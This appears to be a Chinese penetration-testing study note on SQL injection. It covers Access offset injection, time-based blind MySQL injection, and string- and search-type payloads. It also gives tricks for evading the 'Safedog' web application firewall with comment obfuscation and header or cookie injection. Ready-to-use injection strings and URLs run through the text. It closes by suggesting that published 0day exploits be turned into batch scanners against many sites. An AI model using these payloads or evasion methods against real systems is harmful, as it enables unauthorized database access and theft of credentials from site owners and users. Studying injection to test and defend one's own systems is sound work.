渗透学习笔记之access偏移注入

access偏移注入是解决一些注入出不来列名或者时的情况,同时要求支持union select ,列名也必须足够多,知道表名

access注入语句:

1 Order by *

2 a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)

这句话就是说把admin表记为a,同时也记为b,然后查询条件是a表的id列与b表的id列相等,返回所有相等的行,显然,a,b都是同一个表,当然全部返回啦。不理解的查一查语法吧。

3 *代表了所有字段,如你查admin表,他有几个字段,那么*就代表几个字段

制作注入工具:

基于时间的SQL盲注----------延时注入

127.0.0.1/1.php?name=asd‘ and 1=2 union select sleep(5)

127.0.0.1/1.php?name=asd‘ and 1=1 union select sleep(5)

判断是否有注入,如果有注入 查询数据库延迟5秒

127.0.0.1/1.php?name=asd‘ and 1=2 union select 1,2,sleep(5) --%20

判断字段数,正确的就延迟

select * from news where id=1 union select sleep(if(length(database())=5,

2,0)),2,3;

确定数据库长度

select * from news where id=1 union select sleep(if(mid(database(),1,1)=‘x‘,2,0)),2,3;

确定数据库的第一个字段,依次猜数据

确定列名

select * from news where id=1 union select sleep(if(length(table_name)=3,

2,0)),2,3 from information_schema.tables where table_schema=‘sqlin‘ limit 0,1;

mysql> select * from news where id=1 union select sleep(if(mid(table_name,1,1)=‘

x‘,2,0)),2,3 from information_schema.tables where table_schema=‘sqlin‘ limit 1,1

依次确定数据。。。

字符型注入 需要闭合前后单引号

id=1

union select * from sitie where  id = "id"

注入语句为: 1‘ union select 1,2,username from admin and ‘1‘ = ‘1

或者1‘ union select 1,2,username from admin -- -

搜索型注入

在数据库语句中语句为 union select * from sitie where  id like "%id%"

注入语句为: 1%‘ union select 1,2,username from admin and ‘%1%‘ = ‘%1

在渗透网站的时候有时会遇到一些被编码过后的参数,需要识别后才能注入,常见的有十六进制和base64编码,可以用小葵转换之后在进行注入

过狗注入

1 先尝试下不同的提交方式看下,有些时候,安全狗默认不开启检测cookie和post检测,可以尝试下

2 http头许多网站管理员不会开启,可以尝试下http头注入

3  like ‘%1%‘和like‘%cewcwe%‘替代=判断注入 安全狗不拦截

4 突破 union select:/**/ // 3# -- - 用 注释突破
http://www.xxxx.com.cn/xxxx.php?id=1/*!union/*!*//*!select/*!*/1,/*!*/

突破安全狗查询 ,限于mysql 但是无法使用information_schema

只能猜解数据 将这些替换条件写进sqlmap 插件中可以做个过狗的插件。。。。

www.0day5.com,可以上这个网站看看最新的oday ,改写里面的exp改成批量扫描的,批量扫站

时间: 2024-08-09 12:31:47

渗透学习笔记之access偏移注入的相关文章

渗透学习笔记--基础篇--sql注入(字符型)

环境:dvwa1.7数据库:mysql前置知识:sql语句(Click me)      在进行sql注入前,我们先熟悉熟悉select语句.一.打开我们的sql终端 二.进入之后可以看到有mysql>我们输入sql语句,即可返回我们想要的结果,注意分号哟!我们使用的dvwa,在我们前几章设置的时候,会在数据库中生成一个dvwa的database:这里我们使用它来进行我们的select 语句:(1)使用dvwa数据库use dvwa;(2)在users表里查询用户名为'admin'的所有信息se

渗透学习笔记--基础篇--sql注入(数字型)

环境:dvwa 1.7数据库:mysql dvwa的安全等级:medium 一.分析和查找注入点(1)知识点回顾如果上一篇有好好读过的同学应该知道,我们上一篇遇到的字符型注入.也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住.如果我们想要注入自己的payload(有效载荷)的话,则我们必须先闭合前面的单引号或者双引号,否则我们的数据始终会被当做成字符串来处理. 这种类型的注入点称为字符型注入点. (2)这次我们的把防御等级提升了一个层次,来逐步加强我们手工注入的能力以及开更多

1.sqlmap学习笔记之Access注入

使用sqlmap工具进行Acces注入:1.判断一个url是否存在注入点,根据返回数据判断数据库类型: .sqlmap.py -u "http://abcd****efg.asp?id=7" 假设返回内容如下: ------------------------- [INFO] resuming back-end DBMS 'microsoft access' ------------------------- 2.猜数据库表,输入: .sqlmap.py -u "http:/

【安全牛学习笔记】SQLMAP自动注入-ENUMERATION、BRUTE FORCE、UDF IN

伪静态页面不能注入,这是错误的! SQLMAP自动注入08-----ENUMERATION --current-user --current-db --hostname --users --privileges -U username (CU当前账号) --roles --dbs --tables,--exclude-sysdbs -D dvwa -T user -D dvwa -C user --columns [email protected]:~# sqlmap -u "http://19

【安全牛学习笔记】SQLMAP自动注入-INHECTION、DETECTION、TECHNIQUES

SQLMAP自动注入04-----INJECTION -p 指定扫描的参数,使--level失效 -p "user-agent,referer" --skip 排除指定的扫描参数 --level=5 --skip="id,user-agent" URI注入点 sqlmap -u "http://targeturl/param1/value1*/param2/value2/" [email protected]:~# sqlmap -u "

【安全牛学习笔记】SQLMAP自动注入(二)

SQLMAP自动注入(二)-REQUEST和SQLMAP自动注入(三)-OPTIMIZATION SQLMAP自动注入02-----REQUEST --delay 每次http(s)请求之间延迟时间,浮点数,单位为秒,默认无延迟 --timeout 请求超时时间,浮点数,默认为30秒 --retries http(s)连接超时重试次数,默认3次 --randomize 长度.类型与原始值保持一致的前提下,指定每次请求随机取值的参数名 SQLMAP自动注入02-----REQUEST --scop

渗透学习笔记--场景篇--通过mysql的root账号来get shell

场景介绍:         今天的场景是前一周在内网渗透的时候遇到过的,找到一个mysql数据库弱口令.     账号和密码分别是root,也就是mysql中的dba.     这里其实权限很大了,首先mysql的root用户具有文件写权限,同时mysql5.0以上,提供一个system函数,而这个函数通常被攻击者用作shell的接口.     那时在遇到这个弱口令时,我就在想怎样快速的拿下这台主机,通过mysql的root账号.是否有比较快速的方法,这时候,我当然想到了sqlmap.经过查询g

学习笔记之ACCESS和MS-SQL数据库与ZBLOG系统如何选择搭配?

我开始接触ZBLOG系统是因为先了解了月光博客和卢松松之后,因为他们的博客很强悍,让我学习到了不少知识,因此也开始建站了,那时候由于是早期,数据量一般都小,而且系统也都不成熟,因此只有ACCESS这样的小型数据库,也是因为互联网初级发展阶段的缘故,大家对相对复杂的数据库并不了解,也不懂的如何搭建,尤其是对于我这样的入门级人士来说,根本不会搭建SQL SERVER这样的中型数据库,如果要建设自己的博客,那就相当困难了. 环境配置和案例:采用ZBLOG ASP系统,搭配SQL ERVER2008数据

学习笔记 HTTP参数污染注入

HTTP参数污染注入源于网站对于提交的相同的参数的不同处理方式导致. 例如: www.XX.com/a?key=ab&key=3 如果服务端返回输入key的值,可能会有 一: ab 二:3 三:ad3 这三种不同的方式. 具体服务端处理方式如下: Web服务器 参数获取函数 获取到的参数 PHP/Apache $_GET("par") Last JSP/Tomcat Request.getParameter("par") First Perl(CGI)/Ap